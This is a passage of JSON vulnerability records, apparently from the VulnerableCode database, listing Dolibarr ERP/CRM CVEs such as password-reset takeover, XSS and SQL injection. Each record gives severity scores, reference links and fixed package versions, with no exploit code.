dvisories/23/23-4197"},{"reference_url":"https://github.com/advisories/GHSA-r9cm-pw9j-3fpx","reference_id":"GHSA-r9cm-pw9j-3fpx","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-r9cm-pw9j-3fpx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71137?format=json","purl":"pkg:composer/dolibarr/dolibarr@18.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.2"}],"aliases":["CVE-2023-4197","GHSA-r9cm-pw9j-3fpx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6fbp-syak-2qgu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42288?format=json","vulnerability_id":"VCID-6j9z-c2a6-xyhn","summary":"Weak Password Recovery Mechanism for Forgotten Password\nIn “Dolibarr” application, v2.8.1 to v13.0.2 are vulnerable to account takeover via password reset functionality. 
A low privileged attacker can reset the password of any user in the application using the password reset link the user received through email when requested for a forgotten password.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"0.00326","scoring_system":"epss","scoring_elements":"0.55818","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25957"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/87f9530272925f0d651f59337a35661faeb6f377","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/87f9530272925f0d651f59337a35661faeb6f377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25957"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25957","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-
database/CVE-2021-25957"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/370744?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/76015?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6
g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25957","GHSA-c32w-3cqh-f6jx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6j9z-c2a6-xyhn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/54629?format=json","vulnerability_id":"VCID-6v7h-3zbv-eqgt","summary":"Dolibarr ERP and CRM malicious executable loading\nDolibarr ERP/CRM 9.0.1 provides a web-based functionality that backs up the database content to a dump file. However, the application performs insufficient checks on the export parameters to mysqldump, which can lead to execution of arbitrary binaries on the server. 
(Malicious binaries can be uploaded by abusing other functionalities of the application.)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11200","reference_id":"","reference_type":"","scores":[{"value":"0.0116","scoring_system":"epss","scoring_elements":"0.78899","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11200"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/01075081cbcd9130a72115cdb50ee61fc394edc1","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/01075081cbcd9130a72115cdb50ee61fc394edc1"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/d6ae62478c8841fdfe58971494818b599f396d4f","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/d6ae62478c8841fdfe58971494818b599f396d4f"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-488297419","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-48829741
9"},{"reference_url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11200","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11200"},{"reference_url":"https://github.com/advisories/GHSA-2rwh-262r-r85j","reference_id":"GHSA-2rwh-262r-r85j","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2rwh-262r-r85j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442949?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7e
e"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"},{"url":"http://public2.vulnerablecode.io/api/packages/106858?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vuln
erability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3"}],"aliases":["CVE-2019-11200","GHSA-2rwh-262r-r85j"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6v7h-3zbv-eqgt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52645?format=json","vulnerability_id":"VCID-79rb-ssqd-5qd3","summary":"Cross site scripting in dolibarr\nA Cross-site Scripting (XSS) vulnerability exists in the admin/accountant.php file. 
The fields `town`, `name`, and `Accountant code` can be used to escape double quote protection.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2060","reference_id":"","reference_type":"","scores":[{"value":"0.00511","scoring_system":"epss","scoring_elements":"0.66733","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2060"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f"},{"reference_url":"https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2060","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2060"},{"reference_url":"https://github.com/advisories/GHSA-8fvr-7945-mg7w",
"reference_id":"GHSA-8fvr-7945-mg7w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8fvr-7945-mg7w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86726?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5r6g-nb9m-43h1"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-2060","GHSA-8fvr-7945-mg7w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-79rb-ssqd-5qd3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/16642?format=json","vulnerability_id":"VCID-7ee4-1bfq-efd3","summary":"Dolibarr has SQL injection vulnerability in the rowid parameter of the admin dict.php\nDolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. 
Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25710","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11292","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25710"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25710","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25710"},{"reference_url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:1
0Z/"}],"url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip"},{"reference_url":"https://www.dolibarr.org","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org"},{"reference_url":"https://www.exploit-db.com/exploits/46095","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://www.exploit-db.com/exploits/46095"},{"reference_url":"https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via-rowid-parameter","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via-rowid-parameter"},{"reference_url":"https://github.com/advisories/GHSA-xxxg-x793-7fq3","reference_id":"GHSA-xxxg-x793-7fq3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHS
A-xxxg-x793-7fq3"},{"reference_url":"https://www.dolibarr.org/","reference_id":"www.dolibarr.org","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/"}],"url":"https://www.dolibarr.org/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/442946?format=json","purl":"pkg:composer/dolibarr/dolibarr@8.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulner
ability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.5"}],"aliases":["CVE-2019-25710","GHSA-xxxg-x793-7fq3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7ee4-1bfq-efd3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61645?format=json","vulnerability_id":"VCID-8xc8-p2ws-yqar","summary":"Dolibarr ERP and CRM SQLi\nDolibarr ERP/CRM before 10.0.3 allows SQL 
Injection.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19209","reference_id":"","reference_type":"","scores":[{"value":"0.01557","scoring_system":"epss","scoring_elements":"0.81759","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19209"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://herolab.usd.de/security-advisories/usd-2019-0051","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/security-advisories/usd-2019-0051"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19209","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements